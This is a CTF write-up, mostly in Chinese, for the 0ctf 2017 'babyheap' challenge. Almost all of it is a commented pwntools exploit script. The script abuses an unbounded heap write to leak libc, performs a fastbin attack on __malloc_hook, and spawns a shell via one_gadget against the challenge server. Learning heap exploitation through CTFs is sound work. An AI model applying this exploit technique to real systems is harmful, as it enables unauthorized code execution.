babyheap_0ctf_2017

应该是一道非常入门的堆题orz

也没有什么好说的：漏洞是写没有长度限制，但输出只能按一开始 calloc 的大小输出；另一个问题是 read 的条件有点严苛。我一开始用 system，结果没法传参，后来发现用 one_gadget 就行了。

主要目的就是leak libc然后改__malloc_hook

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# from libnum import *

# context.log_level = 'debug'
context.terminal = ['xfce4-terminal','-x','bash','-c']
# NOTE(review): the rest of this file treats the target as 64-bit (u64/p64 on
# the leak, an amd64 libc is loaded below), so 'i386' here looks like a
# leftover from another script. It only affects pwntools helpers that consult
# context.arch (p64/u64 are explicit), so the exploit runs regardless — confirm.
context.arch = 'i386'

def s(string):
  """Send *string* to the target as-is."""
  return sh.send(string)


def sl(string):
  """Send *string* followed by a newline."""
  return sh.sendline(string)


def sla(delim, string):
  """Wait for *delim* from the target, then send *string* plus a newline."""
  return sh.sendlineafter(delim, string)


def sa(delim, string):
  """Wait for *delim* from the target, then send *string* without a newline."""
  return sh.sendafter(delim, string)


def ru(string):
  """Read from the target until *string* has been received; return what was read."""
  return sh.recvuntil(string)


def rl():
  """Read one line from the target."""
  return sh.recvline()


def rv():
  """Read whatever the target currently has pending."""
  return sh.recv()


def it():
  """Hand the connection over to the user interactively."""
  return sh.interactive()


def cl():
  """Close the connection to the target."""
  return sh.close()

# Target selection: local = 1 talks to an instance served on 0.0.0.0:9999
# (the process()/gdb.debug variants are kept commented out); local = 0
# connects to the remote challenge instance. Both branches load the same
# libc build, and every offset used later in this file is tied to it.
local = 0
if local:
  # sh = gdb.debug('./orw','b *0x08048571\nc')
  sh = remote('0.0.0.0', 9999)
  # sh = process('./babyheap_0ctf_2017')
  bin = ELF('./babyheap_0ctf_2017')  # NOTE: shadows the builtin `bin`; not referenced below
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so')
  #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
  sh = remote('buuoj.cn', 20001)
  bin = ELF('./babyheap_0ctf_2017')
  # checksec=False only silences the security-report printout on load.
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so',checksec = False)
def z(a=''):
  """Attach gdb to the running target.

  *a* is passed to gdb.attach as the command script. When it is empty the
  call blocks on stdin (raw_input) so the debugger can be driven by hand
  before the script continues.
  """
  gdb.attach('babyheap_0ctf_2017', a, exe='./babyheap_0ctf_2017')
  if a != '':
    return
  raw_input()

def add(size):
  """Select menu option 1 and answer the size prompt with *size*."""
  for reply in ('1', str(size)):
    sla(':', reply)

def update(index, size, content):
  """Select menu option 2 and answer the index, size and content prompts in turn.

  *content* is sent unchanged; *index* and *size* are converted to str.
  """
  replies = ('2', str(index), str(size), content)
  for reply in replies:
    sla(':', reply)

def free(index):
  """Select menu option 3 and answer the index prompt with *index*."""
  choice, target = '3', str(index)
  sla(':', choice)
  sla(':', target)

def dump(index):
  """Select menu option 4 and answer the index prompt with *index*."""
  for reply in ['4', str(index)]:
    sla(':', reply)


# Everything below is one interactive exchange with the target, so the order
# of the calls is significant and nothing is reordered. All constants are
# specific to the libc build loaded above (libc6_2.23-0ubuntu11_amd64).
add(0x100)  # 0
add(0x100)  # 1
add(0x100)  # 2
add(0x100)  # 3
add(0x100)  # 4

free(1)
# update() has no length check (the bug the writeup describes): 0x110 bytes
# are written into a chunk that was requested with 0x100, so the tail of the
# payload lands beyond that chunk.
update(0, 0x110, 'a'*0x100 + '\x00' *0x8 + '\x21\x02' + '\x00'*6)
update(2,0x108,'b'*0x100 + '\x21\x02' + '\x00'*6)
free(1)
add(0x210)  # 1
update(1, 0x110,'c'*0x100 + '\x00'*8 + '\x11\x01' + '\x00'*6)
free(2)
# Per the writeup, dump output is bounded by the size the chunk was requested
# with; index 1 was requested with 0x210, and the 8 bytes at offset 0x110 of
# that output are taken as the leaked pointer.
dump(1)
ru(': \n')
main_arena = u64(rv()[0x110:0x118]) - 88   # 88: author's leaked-pointer -> main_arena offset for this libc
success('main_arena->{:#x}'.format(main_arena))
# Two hard-coded addresses, presumably copied from one debugging session; only
# their difference matters, and it is valid for this libc build only.
libc_base = main_arena + 0x7f22c259b000 - 0x7f22c295fb20
success('libc_base->{:#x}'.format(libc_base))
malloc_hook = libc.symbols['__malloc_hook'] + libc_base
success('malloc_hook->{:#x}'.format(malloc_hook))
# Computed and printed but not used below; the writeup says system could not
# be given an argument, which is why one_gadget is used instead.
system = libc.symbols['system'] + libc_base
success('system->{:#x}'.format(system))
one_gadget = 0x4526a + libc_base   # hard-coded one_gadget offset for this libc build
success('one_gadget->{:#x}'.format(one_gadget))
sl('')  # presumably clears a pending prompt — purpose not visible from here
add(0x100)  # 2


# Address relative to __malloc_hook used as a chunk header; constant from the writeup.
fake_chunk_head  = malloc_hook - 0x1b -0x8
add(0x60)  # 5
add(0x60)  # 6
add(0x60)  # 7

free(6)
# Second over-length write: 0x78 bytes into a chunk requested with 0x60, with
# fake_chunk_head at the end of the payload.
update(5, 0x78, 'd'*0x60 + '\x00'*8 + '\x71' + '\x00'*7 + p64(fake_chunk_head))
add(0x60)  # 6
add(0x60)  # 8
# offset is chosen so that p64(one_gadget) lands exactly at malloc_hook,
# counting from fake_chunk_head + 0x10.
offset = malloc_hook - (fake_chunk_head + 0x10)
update(8, offset + 8, 'a' * offset + p64(one_gadget))

ru(':')
# One more allocation after __malloc_hook has been overwritten.
add(0x40)

# z('c')
it()
